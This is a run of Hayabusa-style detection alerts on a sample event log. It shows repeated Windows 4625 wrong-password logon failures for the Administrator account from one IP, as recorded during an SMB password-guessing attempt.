2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EjK8A8DTSYursBzj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UaDCKPslwRaLBWtH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xAvoekviFDSAIgBe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3XOmFwh8IamESWCM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 54GbW769j1x27mrI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bZSkhwZXc1SSknDT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 05AuqlN44x7oJGoi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RQ4A6ReTVTcFCFeN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T7U6i4CMrL0bHouf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NaeA4uZ6o8BRbzwf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MEnlL5BHmlCrtk7p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KRNMpwAAaTsyzPfR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oBtHQkRWIoq5hfn7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5pkk9lgqMQ4wxQel  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yQVan7kRDOlnim50  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9282GqsC7UiUMbRl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3lj7GjYryW9wjGgS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MPy4iUy5WBSLUBdy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0kvD9DEuos8SRrLH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NH1EnMG6fTvcz4QR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cqHDXSQn8gkl2LJy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RWI9XDDHjs2xcNB7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zo53mEz6nal5Gxff  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jtOgC6wqMoNYVxId  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DdadoJYvD7DYjlSG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U1xjdqjT9h0KUqG2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QfkzZBvO4onYx6JZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JqY8CvyODDLQV9Ps  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nPMRIxRVuh13jmZD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jARkTWdKTfTIwlug  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zwhkc71Nfn7QDf7c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qsYad9PgEajlYqvo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v9YPw0DsspVbrOld  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wsHpLCOdAOPFM6nD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OcNytOhGOZKaREL9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lc5boBVigHE1ccGA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BQXg4ZHdBYHyiTTO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JebTJzyn91NrpvkD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8wCE5ypjEU5feEEv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OglsROoqX48xm0gJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5bNC9ES3l3KwXPxb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: byPavQuiscMm7CMW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UQESAC3XpxCJJfG5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5aYRnzirSj0PNXAE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8s9xJ659geFHOlY4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yBQdyO0diiFixwlx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vzULtccOFnLIRiVM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1pDEGzqTAyUab5P8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gomgb26W9qFacRr7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GXOcDu88S5c5VwwV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WHRnzgQkfAhsUguj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A0Q9ZIaRK43W9apv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2xvriGeIlDwtzS36  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pDYTFqeJC61Nneef  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0LNR7xCHW9x2q2qc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AE4EBj8X5IfXO8ZZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2BEOSGw6TjZf9GWS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UCxe24uL4A6R9kgZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F8v4DcIRkx43KCIs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CY2buVupQ5oR1Cp5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f6c3MlpMEzkCVud2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E2wV6op9AU4paDXp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BNn6aywSs67hVAO2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wUa03SIX69WCIYbp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zYi4TB42B2VQm5Tr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9mnUbGMnlrOR8Tv4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CJGMWqgmbXABdPvB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2W9BbDYgC6vhqU3o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q6DYsaih1Yhb2uOD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q4o93QpJL4pxx94q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lQf1OsHb4lpgMPbl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HcJUYelneVqBQjr9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I0d6daEeIadJRbBI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
